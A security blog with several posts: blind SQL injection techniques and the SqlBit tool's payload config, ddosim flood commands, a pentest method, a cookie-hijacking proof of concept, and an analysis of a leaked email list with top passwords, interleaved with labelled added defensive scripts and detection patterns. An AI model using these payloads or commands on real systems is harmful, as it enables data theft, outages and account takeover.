Guide For Designing Cyber Security Exercises

Posted in Cyber Defense on January 26, 2010 by stormsecurity

Here is an article that I’ve recently published at the Information Security and Privacy WSEAS International Conference – December 2009.

Abstract: Cyber security exercises are a very effective way of learning the practical aspects of information security. But designing such exercises is not an easy task and requires the work of several people. This paper presents a number of steps and guidelines that should be followed when designing a new cyber security exercise. The steps include: defining the objectives, choosing an approach, designing the network topology, creating a scenario, establishing a set of rules, choosing appropriate metrics and learning lessons. The intended audience of this paper is persons who are in charge of the design and organization of a new cyber security exercise and do not have the experience of previous exercises.

Key-Words: cyber security exercise, cyber defense exercise, security education, design guide

If you have any questions, feel free to contact me.


GROUP_CONCAT() for Oracle blind SQL injection

Posted in How To on January 13, 2010 by stormsecurity

GROUP_CONCAT() is a MySQL function that returns a string formed by concatenating multiple rows of a table.

This function is very useful in blind SQL injection attacks where you often need to extract multiple rows from a table in a single query. Then you will probably obtain this data through an out-of-band channel.

Unfortunately, Oracle does not have such a function. So what do you do if you need to extract multiple rows in a single query?

After a few hours of searching I have found a solution that works:

Assuming you have a table called mytable which has a column called mycolumn, you can obtain a concatenation of all the values from mycolumn by using this query:

SELECT LTRIM(MAX(SYS_CONNECT_BY_PATH(mycolumn, ',')) KEEP (DENSE_RANK LAST ORDER BY curr), ',') AS xyz
FROM (SELECT mycolumn, rownum AS curr, rownum - 1 AS prev
      FROM mytable
      WHERE mycolumn <= 'C02BC00555')
CONNECT BY prev = PRIOR curr
START WITH curr = 1

This worked for me in Oracle 10g but I'm pretty sure it works for other versions too.

Cheers,

Check if your email account has been exposed!

Posted in News analysis on October 12, 2009 by stormsecurity

This post is about the 24,000 email accounts that were recently made public (along with their passwords) on pastebin.com website, a few days ago. From the depths of the Internet (some Google cache) I have managed to get a copy of that list. I have split that list in two and HERE is the username list and HERE is the (shuffled!) password list.

Anyone interested can search for himself in the username list to see if his account has been exposed. The passwords do not match because I have intentionally shuffled them. My purpose was not to expose people's passwords but to make a statistical analysis of the 24k list, similar to this analysis made on the first 10k list of accounts posted on pastebin.com.

So, the list that I found initially had 24,546 entries. Not all of them were in the username@domain/password format so, after a bit of cleaning, I got a list of 23,573 useful accounts. Then I removed the duplicates and got a final list of 21,686 entries. This is the list on which I have made my analysis.

I should mention that there are not only Hotmail accounts in the list but also Yahoo, Gmail, AOL and other accounts. Here are the top 20 domains and the number of accounts for each of them:

1. hotmail.com – 12478
2. yahoo.com – 3012
3. aol.com – 827
4. gmail.com – 512
5. msn.com – 443
6. hotmail.fr – 346
7. comcast.net – 321
8. aim.com – 287
9. sbcglobal.net – 275
10. hotmail.co.uk – 206
11. neomail.com – 153
12. hotmail.es – 117
13. cox.net – 116
14. verizon.net – 96
15. bellsouth.net – 95
16. live.com.mx – 71
17. yahoo.ca – 63
18. yahoo.co.uk – 63
19. charter.net – 47
20. earthlink.net – 46

And the pie version if you like:

Domain distribution

If we look at the usernames, we can see that the first 9,586 of them are alphabetically ordered and they are the ones from the first list posted on pastebin.com. They begin with the letters ‘A’ and ‘B’. As Mr. Bogdan Calin said, based on their passwords, they seem to belong to the Latino community. But the rest of the accounts seem to be from all over the world.

The most used password is still 123456. As you can see below, out of the total of 21,686 passwords, 91 were 123456. Here is the top 100 of the most commonly used passwords from the list:

1. 123456 – 91
2. neopets – 39
3. monkey – 27
4. 123456789 – 26
5. 123321 – 24
6. password – 23
7. iloveyou – 17
8. princess – 16
9. horses – 16
10. tigger – 15
11. pokemon – 14
12. cheese – 14
13. 111111 – 13
14. kitty – 13
15. purple – 12
16. dragon – 12
17. nicole – 12
18. 1234567 – 11
19. alejandra – 11
20. daniel – 11
21. bubbles – 10
22. alejandro – 10
23. michelle – 10
24. 12345 – 10
25. hello – 10
26. cookie – 10
27. chocolate – 9
28. hottie – 9
29. alberto – 9
30. 12345678 – 9
31. fluffy – 9
32. buddy – 9
33. 123123 – 9
34. cassie – 9
35. andrea – 9
36. secret – 9
37. shadow – 9
38. tequiero – 9
39. metallica – 9
40. poop – 8
41. hi – 8
42. sebastian – 8
43. jessica – 8
44. adopt – 8
45. 654321 – 8
46. justin – 7
47. newpw123 – 7
48. scooter – 7
49. soccer – 7
50. holly – 7
51. hannah – 7
52. flower – 7
53. 1234 – 7
54. jessie – 7
55. ashley – 7
56. tiger – 7
57. lauren – 7
58. football – 7
59. elizabeth – 7
60. casper – 7
61. roberto – 7
62. 000000 – 7
63. legolas – 7
64. estrella – 7
65. 159753 – 7
66. anime – 7
67. sabrina – 6
68. moomoo – 6
69. angelica – 6
70. cat123 – 6
71. bonita – 6
72. buster – 6
73. kitten – 6
74. killer – 6
75. qwerty – 6
76. chelsea – 6
77. sasuke – 6
78. olivia – 6
79. theresa – 6
80. america – 6
81. beatriz – 6
82. mariposa – 6
83. oscar – 6
84. rainbow – 6
85. yellow – 6
86. cool – 6
87. ginger – 6
88. maggie – 6
89. friends – 6
90. asdfgh – 6
91. abc123 – 6
92. neopet – 6
93. dancer – 6
94. amanda – 6
95. avatar – 6
96. boogie – 6
97. greenday – 6
98. thumper – 6
99. 666666 – 6
100. bob – 6

Regarding the password format, I could extract the following statistics:

  • 43.3% alphanum, lower case. Example: monkey
  • 2.1% alphanum, lower and upper. Example: Thomas
  • 15.8% numeric only passwords. Example: 123456
  • 35.1% alphanum and numbers. Example: j0s3ph
  • 3.6% alphanum, numbers and special chars. Example: sandra19_1961
  • 30% numeric ended passwords. Example: hello1

If we look at the password lengths in the following graph, we can see that most of them are 6 characters long:

Password length distribution
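The statistics above (top domains, top passwords, password shape classes and length distribution) can be reproduced over any list in the username@domain/password format. The script below is an added example written for this post, not the author's own analysis script; it runs on a small constructed sample instead of the leaked list, and the class definitions (letters-only lowercase, letters-only mixed case, digits only, letters plus digits, anything with a non-alphanumeric character, and the overlapping "ends in a digit" class) are this example's reading of the categories listed above.

```python
import re
from collections import Counter

# Constructed sample in the username@domain/password format the post describes;
# these are made-up entries, not rows from the leaked list.
SAMPLE_LINES = """\
alice@hotmail.com/123456
bob@yahoo.com/monkey
carla@hotmail.com/Thomas
dan@gmail.com/j0s3ph
eva@hotmail.com/sandra19_1961
frank@aol.com/hello1
gina@yahoo.com/123456
alice@hotmail.com/123456
broken line without separator
""".splitlines()


def parse_accounts(lines):
    """Keep only user@domain/password lines, then drop exact duplicates (order preserved)."""
    seen = set()
    accounts = []
    for line in lines:
        m = re.fullmatch(r"([^@/\s]+)@([^/\s]+)/(.+)", line.strip())
        if not m:
            continue  # not in the expected format: discarded, as in the post's cleaning step
        entry = (m.group(1), m.group(2).lower(), m.group(3))
        if entry in seen:
            continue
        seen.add(entry)
        accounts.append(entry)
    return accounts


def top_domains(accounts, n=20):
    """Most common mail domains with their account counts."""
    return Counter(domain for _, domain, _ in accounts).most_common(n)


def top_passwords(accounts, n=100):
    """Most common passwords with their counts."""
    return Counter(pw for _, _, pw in accounts).most_common(n)


def password_classes(accounts):
    """Share of passwords in each shape class (percent, one decimal).

    The first five classes are disjoint; 'digit_ended' overlaps with them,
    like the 30% figure in the post.
    """
    pws = [pw for _, _, pw in accounts]
    total = len(pws)

    def pct(pred):
        return round(100.0 * sum(1 for p in pws if pred(p)) / total, 1) if total else 0.0

    return {
        "lower_alpha":  pct(lambda p: p.isalpha() and p.islower()),
        "mixed_alpha":  pct(lambda p: p.isalpha() and not p.islower() and not p.isupper()),
        "numeric_only": pct(lambda p: p.isdigit()),
        "alpha_digits": pct(lambda p: p.isalnum() and not p.isalpha() and not p.isdigit()),
        "with_special": pct(lambda p: not p.isalnum()),
        "digit_ended":  pct(lambda p: p[-1].isdigit()),
    }


def length_distribution(accounts):
    """Password length -> number of passwords of that length, sorted by length."""
    return dict(sorted(Counter(len(pw) for _, _, pw in accounts).items()))


if __name__ == "__main__":
    accounts = parse_accounts(SAMPLE_LINES)
    print("accounts after cleaning and de-duplication:", len(accounts))
    print("top domains:", top_domains(accounts, 5))
    print("top passwords:", top_passwords(accounts, 5))
    print("classes:", password_classes(accounts))
    print("lengths:", length_distribution(accounts))
```

Domains are lower-cased before counting so that `Hotmail.com` and `hotmail.com` are not reported as two entries; passwords are compared case-sensitively, since `Thomas` and `thomas` are different credentials.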

In conclusion, now is a good time to do our regular password change routine. Choose a long and complex password and beware of phishing attempts!

Cheers,

SqlBit – a new blind SQL injection exploiter

Posted in Tools (StormSecurity) on October 8, 2009 by stormsecurity

SqlBit is a tool that can be used to execute arbitrary queries on a MySQL database and view the results by exploiting a blind SQL injection vulnerability on the web application that uses that database. It extracts data bit by bit. SqlBit can be downloaded and used freely from here.

You can run SqlBit like this:

perl sqlbit.pl "arbitrary SQL query"

Example:

perl sqlbit.pl "SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'"

This application was written in Perl so it can run anywhere you have a Perl interpreter (Windows, Linux, etc). It is fully customizable by using a configuration file config.txt where you can set many parameters from the HTTP request. The configuration file looks like this:

HTTP_Method=POST
URL=http://www.vulnerabile-site.com/login.php
HTTP_VERSION=HTTP/1.1
Host=www.vulnerabile-site.com
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729) Paros/3.2.13
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-us
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=300
Proxy-Connection=keep-alive
Referer=http://www.vulnerabile-site.com/index.php
Cookie=PHPSESSID=776a2e7181af170e7d57f51773b9527b
Content-Type=application/x-www-form-urlencoded
Content-Length=21
param: user=j' and ($SQL$) -- '
param: password=xxx

You can see that SqlBit needs a place in the request where it can put a valid SQL query; this place is marked by the string $SQL$. You should first verify that a query placed there gets executed successfully.

That’s all about the functionality of SqlBit. If you want to know more, here is some background information:

During some of my pentests I encountered blind SQL injection vulnerabilities. I tried to use a few tools that were supposed to exploit them but none of them reached my expectations. So I decided to write my own tool and here it is.

As you may already know, blind SQL injection is when you can’t see the result of a query but it gets executed successfully on the server side. For instance:

httx://www.vulnerable-site.com/view.jsp?page=13' limit 0 union select 1,2,3 from dual where 1 -- '

This can be specified in SqlBit configuration file as:

param: page=13' limit 0 union select 1,2,3 from dual where $SQL$ -- '

If the URL above produces the same output as the legitimate URL:

httx://www.vulnerable-site.com/view.jsp?page=13

it might be because the parameter page is not filtered correctly and we can inject SQL commands. But we cannot always see the output of our SQL commands because of the application internal logic or other reasons.

In this case we can use a timing attack that is based on this MySQL query:

SELECT IF(expression, true, false)

where expression is a query that returns true or false. In the true case we sleep (using BENCHMARK) for a certain amount of time, while in the false case we return directly. This way we can tell whether a bit of data is 0 or 1.

By automating the requests, we can extract data from the database bit by bit.
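Both of the query shapes discussed on this page leave recognisable traces in web server logs: the MySQL timing technique (IF with BENCHMARK or SLEEP, and one request per bit, so many requests from one source with alternating slow and fast responses) and the Oracle row-concatenation trick from the GROUP_CONCAT post above (SYS_CONNECT_BY_PATH, CONNECT BY). The following detector is an added example written for this page, not part of SqlBit; it assumes an Apache combined log with the response time in microseconds (%D) appended as the last field, and runs over constructed log lines, so the addresses and payloads are made up.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines (combined format with %D response time in
# microseconds appended); made up for this example, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Oct/2009:10:00:01 +0000] "GET /view.jsp?page=13 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 12000
10.0.0.9 - - [08/Oct/2009:10:00:02 +0000] "GET /view.jsp?page=13%27+limit+0+union+select+1%2C2%2C3+from+dual+where+IF%281%3D1%2CBENCHMARK%285000000%2CMD5%281%29%29%2C0%29+--+%27 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 2100000
10.0.0.9 - - [08/Oct/2009:10:00:05 +0000] "GET /view.jsp?page=13%27+limit+0+union+select+1%2C2%2C3+from+dual+where+IF%281%3D2%2CBENCHMARK%285000000%2CMD5%281%29%29%2C0%29+--+%27 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 15000
10.0.0.7 - - [08/Oct/2009:10:00:07 +0000] "GET /search?q=SELECT+LTRIM%28MAX%28SYS_CONNECT_BY_PATH%28mycolumn%2C%27%2C%27%29%29%29+FROM+mytable+CONNECT+BY+prev+%3D+PRIOR+curr HTTP/1.1" 500 0 "-" "curl/7.19" 9000
10.0.0.5 - - [08/Oct/2009:10:00:09 +0000] "GET /view.jsp?page=14 HTTP/1.1" 200 5300 "-" "Mozilla/5.0" 11000
""".splitlines()

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<usec>\d+)$'
)

# Indicator patterns for the techniques discussed on the page. They are matched on the
# URL-decoded request, not parsed as SQL, so expect to tune them per application.
SIGNATURES = {
    "mysql_time_based": re.compile(r"\b(?:BENCHMARK|SLEEP)\s*\(", re.I),
    "mysql_conditional": re.compile(r"\bIF\s*\(", re.I),
    "oracle_row_concat": re.compile(r"\bSYS_CONNECT_BY_PATH\s*\(|\bCONNECT\s+BY\b", re.I),
    "comment_tail": re.compile(r"--\s*'?$|/\*"),
}

SLOW_USEC = 1_000_000  # a response over 1 s next to a timing signature is the "true" branch


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["decoded_url"] = unquote_plus(d["url"])
    d["usec"] = int(d["usec"])
    return d


def classify(entry):
    """Return the names of the signatures that fire on the decoded request URL."""
    url = entry["decoded_url"]
    return [name for name, rx in SIGNATURES.items() if rx.search(url)]


def analyze(lines):
    """Flag requests carrying injection signatures and list the sources whose flagged
    requests show the timing pattern (both a slow and a fast response)."""
    alerts = []
    per_ip = defaultdict(list)
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        hits = classify(e)
        if not hits:
            continue
        slow = e["usec"] >= SLOW_USEC and "mysql_time_based" in hits
        alerts.append({"ip": e["ip"], "url": e["url"], "signatures": hits, "slow": slow})
        per_ip[e["ip"]].append(e["usec"])
    timing_sources = sorted(
        ip for ip, times in per_ip.items() if max(times) >= SLOW_USEC and min(times) < SLOW_USEC
    )
    return alerts, timing_sources


if __name__ == "__main__":
    found, sources = analyze(SAMPLE_LOG)
    for a in found:
        print(a["ip"], a["signatures"], "slow" if a["slow"] else "fast")
    print("sources showing the timing pattern:", sources)
```

The per-source timing check is what distinguishes a bit-by-bit extraction from a one-off scanner probe: the attacker's requests differ only in the condition, so the same source alternates between slow (condition true) and fast (condition false) responses over many requests.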

Enjoy!

Application Layer DDoS Simulator

Posted in DDoS, Tools (StormSecurity) on March 3, 2009 by stormsecurity

Update (November 2010): ddosim v0.2 has been released. You can find it at: https://sourceforge.net/projects/ddosim/.

ddosim is a tool that can be used in a laboratory environment to simulate a distributed denial of service (DDOS) attack against a target server. The test will show the capacity of the server to handle application specific DDOS attacks. ddosim simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server. After completing the connection, ddosim starts the conversation with the listening application (e.g. HTTP server).

ddosim is written in C++ and runs on Linux. Its current functionalities include:

  • HTTP DDoS with valid requests
  • HTTP DDoS with invalid requests (similar to a DC++ attack)
  • SMTP DDoS
  • TCP connection flood on random port

In order to simulate such an attack in a lab environment we need to set up a network like this:

Network configuration for DDOS simulation


On the victim machine ddosim creates full TCP connections – which are only simulated connections on the attacker side.

There are a lot of options that make the tool quite flexible:

Usage: ./ddosim
-d IP            Target IP address
-p PORT          Target port
[-k NET]         Source IP from class C network (ex. 10.4.4.0)
[-i IFNAME]      Output interface name
[-c COUNT]       Number of connections to establish
[-w DELAY]       Delay (in milliseconds) between SYN packets
[-r TYPE]        Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
[-t NRTHREADS]   Number of threads to use when sending packets (default 1)
[-n]             Do not spoof source address (use local address)
[-v]             Verbose mode (slower)
[-h]             Print this help message

Examples:

1. Establish 10 TCP connections from random IP addresses to www server and send invalid HTTP requests (similar to a DC++ based attack):

./ddosim -d 192.168.1.2 -p 80 -c 10 -r HTTP_INVALID -i eth0

2. Establish infinite connections from source network 10.4.4.0 to SMTP server and send EHLO requests:

./ddosim -d 192.168.1.2 -p 25 -k 10.4.4.0 -c 0 -r SMTP_EHLO -i eth0

3. Establish infinite connections at higher speed to www server and make HTTP valid requests:

./ddosim -d 192.168.1.2 -p 80 -c 0 -w 0 -t 10 -r HTTP_VALID -i eth0

4. Establish infinite TCP connections (without sending a Layer 7 request)  from local address to a POP3 server:

./ddosim -d 192.168.1.2 -p 110 -c 0 -i eth0


More background info:

Some of the hardest to mitigate distributed denial of service attacks are the ones targeting the application layer (in the TCP/IP stack). They are difficult to stop because they look legitimate to classic firewalls, which let them pass freely (for an example look here). The only way to stop this kind of attack is deep packet inspection (layer 7 inspection), which means a lot of money/resources.

In general, a DDoS attack is performed by an army of bots (zombies) that simultaneously send attack packets to a victim server. If we talk about UDP packets (ex. targeting a DNS server), the attack is easier to implement because a zombie only needs to send a single UDP packet (multiple times) to contribute to the attack. But in the case of a TCP based attack, the zombie first needs to complete the full TCP 3-way handshake and then send the data packets (e.g. HTTP GET request). ddosim successfully simulates this attack scenario.
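Since the completed handshake makes every connection look legitimate to a layer 3/4 firewall, the server side of such a lab test needs the layer 7 view described above. The script below is an added example for this post, not part of ddosim: it aggregates a connection log per second, reports how many connections arrived, from how many distinct sources, what share came from one /24 network (the shape of the `-k NET` option) and what share never sent a valid HTTP request line (the HTTP_INVALID shape or a bare TCP connection flood), and flags the seconds that look like a flood. The records and addresses are constructed for the example.

```python
import ipaddress
from collections import Counter, defaultdict

# Constructed connection-log records as a web server could provide them:
# (unix_second, source_ip, first_request_line_or_None). Made up for this example.
SAMPLE_RECORDS = [
    (100, "192.168.1.50", "GET /index.html HTTP/1.1"),
    (100, "192.168.1.51", "GET /about.html HTTP/1.1"),
    (101, "192.168.1.50", "GET /news.html HTTP/1.1"),
] + [
    # 40 connections in one second from hosts of 10.4.4.0/24, each completing the
    # handshake and then sending a junk request line (the HTTP_INVALID shape)
    (102, f"10.4.4.{i}", "\x01\x02garbage\r\n") for i in range(1, 41)
] + [
    # 30 more in the next second that complete the handshake but never send a request
    (103, f"10.4.4.{i}", None) for i in range(41, 71)
]


def is_valid_request_line(line):
    """Minimal HTTP/1.x request-line check: METHOD SP request-target SP HTTP/x.y"""
    if line is None:
        return False
    parts = line.strip().split(" ")
    return (len(parts) == 3 and parts[0].isalpha() and parts[0].isupper()
            and parts[1].startswith("/") and parts[2].startswith("HTTP/"))


def per_second_stats(records, prefix_len=24):
    """Per second: connection count, distinct sources, the network contributing most
    connections with its share, and the share of connections without a valid request."""
    buckets = defaultdict(list)
    for ts, ip, req in records:
        buckets[ts].append((ip, req))
    stats = {}
    for ts, conns in sorted(buckets.items()):
        nets = Counter(
            str(ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)) for ip, _ in conns
        )
        top_net, top_count = nets.most_common(1)[0]
        invalid = sum(1 for _, r in conns if not is_valid_request_line(r))
        stats[ts] = {
            "connections": len(conns),
            "distinct_sources": len({ip for ip, _ in conns}),
            "top_network": top_net,
            "top_network_share": round(top_count / len(conns), 2),
            "invalid_share": round(invalid / len(conns), 2),
        }
    return stats


def flag_flood(stats, max_conn_per_sec=20, max_invalid_share=0.5):
    """Seconds whose traffic exceeds the connection rate and is mostly non-HTTP."""
    return [ts for ts, s in stats.items()
            if s["connections"] > max_conn_per_sec and s["invalid_share"] > max_invalid_share]


if __name__ == "__main__":
    stats = per_second_stats(SAMPLE_RECORDS)
    for ts, s in stats.items():
        print(ts, s)
    print("flood seconds:", flag_flood(stats))
```

The thresholds are placeholders for a lab; what matters is that the decision uses the application payload (a valid request line or not) and the source distribution, neither of which a stateful packet filter sees once the handshake has completed. A flood of HTTP_VALID requests would pass the request-line check, which is exactly why the post calls those the hardest to mitigate; for that case the rate and source-network share are the only columns left to act on.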

If you have any questions regarding ddosim, please let me know.

Procedural SQL injection

Posted in How To on October 15, 2008 by stormsecurity

How do you perform a complete SQL injection test on a web site?

As a penetration tester, I often had to test the security of various sites. One of the problems I have seen during those tests was that the results given by me were not 100% complete. I succeeded in finding many SQL injection bugs but sometimes not all of them. So I have developed a methodology that can be used to do thorough SQL injection tests.

My opinion is that automatic tools cannot find all SQL injection bugs, but only the superficial ones. Their results must be completed by manual tests that exploit the logic of the application and the flow of data within the application.

During the tests I use Paros as the automatic helper tool. It is a very good local web proxy that has MITM, spider and scanner capabilities. The steps to do an SQL injection test are:

  1. Start Paros and configure your web browser to use it as a proxy (localhost:8080). From now on, every request made by your browser will pass through Paros and you will be able to see it, resend it or modify it (including the “hidden” requests).
  2. The testing architecture looks like this:
  3. Start browsing manually the targeted website
    • Find as many forms as you can and submit them with random data
    • You can use the Site Map (if it exists) to identify the interactive pages (ex. Search, Contact, Feedback, Ask a question) and submit data
    • All the requests that you do will be memorized by Paros
  4. Use the Spider utility from Paros to do an automatic crawling in order to find as many pages as it can from that web site
    • Step 2 is necessary because Paros does not always find all the site pages and because it uses the pages already discovered to crawl them too
  5. Do an SQL injection scan with Paros
    • Change the Scan Policy to include only SQL injection and SQL injection fingerprinting
    • Start the Scan
    • Paros will try to call all the dynamic pages that it has already found with parameters according to the Scan Policy
  6. Now comes the part that requires true skills
    • Analyse the alerts found by Paros
    • See what are the pages and parameters that allow injection
    • Reproduce manually the injection
    • Try to exploit the bug and find real information from the backend database
    • Categorize the vulnerability based on its impact (what can you do with it)
      • HIGH – allows extraction of information from the database (in band or out of band)
      • MEDIUM – allows the attacker to see application error messages but it is not obvious how it can be used to extract information from the database
      • LOW – produces an application malfunction but does not give any error messages and cannot be used to extract information from the database
  7. In order to find other SQL injection bugs, you must understand the logic of the application and try to “reverse-engineer” it. Think about how the programmer wrote the application and identify the vulnerable points.
  8. Write a detailed report on the vulnerabilities found and the ways they can be exploited in order to affect the information from the database and the functionality of the website.

I also found some SQL injection cheat sheets for different databases, like this and this, very useful.

Clear text email insecurity (+ PoC)

Posted in Tools (StormSecurity) on September 5, 2008 by stormsecurity

There are many people who use publicly available email systems like Yahoo mail, Hotmail, Gmail (HTTP). In this post you will see how easy it is to gain access to someone’s email session by exploiting the clear-text HTTP protocol. You can also find a tool I wrote – YM_hijack – which is a proof of concept of the theory described.

A little bit of theory

Web servers can identify a client through a piece of data that it sends, called a cookie. After the client authenticates itself to the server (by username and password), the server assigns unique cookies to that client. When the client makes a request to the server using those cookies, the server knows that he is who he pretends to be and allows him to access personal data.

Most web-based email systems use the mechanism described above and most of them do not encrypt their traffic. As you know, HTTP is a clear text protocol and anything sent over the network using HTTP can be sniffed and interpreted.

So, in a LAN environment, by using a sniffer and a man-in-the-middle tool you can get the cookies used for session identification and use them in your own browser to impersonate the real cookie owner. I think the image below clarifies the scenario.

Proof of concept – the automatic way

YM_hijack is a tool that automates the process described in the picture above. It must be run on the “Man in the Middle” host (see the picture). It does not have any MITM (man in the middle) capabilities so, in order to do that, you must use another tool like Cain or Ettercap or arpspoof or macof.

Prerequisites (for YM_hijack.exe):  Windows XP, Mozilla Firefox (2 or above)

Prerequisites (for YM_hijack.py):  Windows XP, Mozilla Firefox (2 or above), Python, Pcapy, Impacket

How does it work?

  • Make yourself Man-in-the-middle
  • Start YM_hijack.exe (or the python version) which does the following:
    • Sniff packets from the network destined for tcp port 80
    • Extract HTTP payload and search for Yahoo mail specific cookies (Y, B, T)
    • Create a new Firefox profile named after the IP address of the originator
    • Create the cookies.txt file in the newly created profile’s folder
    • Start a new instance of Firefox with the new profile
    • Enter directly into the Yahoo mail session of the ‘poor guy’

You can find more details by studying the source code (for python speakers).

The solutions:

  • use HTTPS during the entire session (Gmail has an option to do that)
  • encrypt your email content using PGP or a similar tool
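Whether the first solution is actually in place can be checked from the server's own response: a session cookie that is set without the Secure attribute will be sent by the browser on any plain HTTP request to that domain, even if the login itself happened over HTTPS, and without Strict-Transport-Security the first request of a session may still travel in clear text. The audit function below is an added example written for this post, not part of YM_hijack; it parses a raw HTTP response, picks out the session cookies (the Y, T and B names mentioned above, configurable) and reports how a sniffer on the path could obtain them. Both responses are constructed for the example.

```python
# Constructed HTTP response as a webmail login over plain HTTP might return it;
# made up for this example, not a real provider's response.
SAMPLE_HTTP_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Set-Cookie: Y=v=1&n=abc123; Domain=.example.com; Path=/\r\n"
    "Set-Cookie: T=z=def456; Domain=.example.com; Path=/\r\n"
    "Set-Cookie: B=ghi789; Domain=.example.com; Path=/; Expires=Fri, 05-Sep-2009 00:00:00 GMT\r\n"
    "\r\n"
    "<html>...</html>"
)

# The same session as a hardened deployment would answer it (also constructed).
SAMPLE_HTTPS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Set-Cookie: Y=v=1&n=abc123; Domain=.example.com; Path=/; Secure; HttpOnly\r\n"
    "Set-Cookie: T=z=def456; Domain=.example.com; Path=/; Secure; HttpOnly\r\n"
    "\r\n"
)


def parse_headers(raw_response):
    """Return [(lowercase header name, value)] from a raw HTTP response, status line excluded."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def parse_set_cookie(value):
    """Split a Set-Cookie value into (cookie name, set of lowercase attribute names)."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:] if p}
    return name, attrs


def audit_session_cookies(raw_response, over_tls, session_cookie_names=("Y", "T", "B")):
    """List the ways a session cookie in this response is exposed to a network sniffer.

    over_tls says how the response itself was received; the cookie attributes decide
    what the browser will do on later requests.
    """
    findings = []
    headers = parse_headers(raw_response)
    if not over_tls:
        findings.append("response delivered over clear-text HTTP: headers and body are readable on the wire")
    has_hsts = any(name == "strict-transport-security" for name, _ in headers)
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie, attrs = parse_set_cookie(value)
        if cookie not in session_cookie_names:
            continue
        if "secure" not in attrs:
            findings.append(f"cookie {cookie} lacks Secure: the browser will also send it over plain HTTP")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie} lacks HttpOnly: readable by page scripts")
    if over_tls and not has_hsts:
        findings.append("no Strict-Transport-Security header: the first request may still go over HTTP")
    return findings


if __name__ == "__main__":
    for label, raw, tls in (("http", SAMPLE_HTTP_RESPONSE, False), ("https", SAMPLE_HTTPS_RESPONSE, True)):
        print(label)
        for f in audit_session_cookies(raw, tls) or ["no findings"]:
            print("  -", f)
```

The same check can be run against a live service by capturing one login response with the local proxy already used on this blog (Paros) and pasting it in; the point of the three checks together is that HTTPS on the login page alone does not help when the cookies it sets are later replayed over HTTP.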

Conclusion:

Think twice before using/choosing the email, especially with confidential information!